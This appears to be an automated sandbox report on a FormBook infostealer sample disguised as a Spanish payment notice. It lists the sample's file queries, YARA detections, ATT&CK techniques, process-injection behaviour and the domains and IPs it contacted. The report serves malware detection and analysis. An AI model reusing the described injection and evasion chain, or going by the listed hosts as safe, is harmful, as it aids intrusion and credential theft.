          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception612
          Process Injection          		1
          Masquerading          		OS Credential Dumping221
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets112
          System Information Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items23
          Software Packing          		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          File Deletion          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626150 Sample: Notificaci#U00f3n de pago.exe Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 31 www.triptoasiam.com 2->31 33 www.massage-rino.com 2->33 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 8 other signatures 2->47 11 Notificaci#U00f3n de pago.exe 3 2->11         started        signatures3 process4 file5 29 C:\...29otificaci#U00f3n de pago.exe.log, ASCII 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 Notificaci#U00f3n de pago.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.librevillegabon.com 104.195.7.239, 49764, 80 ESITEDUS United States 18->35 37 theguiriguide.com 192.0.78.25, 49761, 80 AUTOMATTICUS United States 18->37 39 4 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 WWAHost.exe 18->22         started        signatures11 process12 signatures13 51 Self deletion via cmd delete 22->51 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Notificaci#U00f3n de pago.exe21%VirustotalBrowse
          Notificaci#U00f3n de pago.exe41%ReversingLabsByteCode-MSIL.Trojan.FormBook
          Notificaci#U00f3n de pago.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.massage-rino.com0%VirustotalBrowse
          theguiriguide.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.fontbureau.comlvfetDm0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
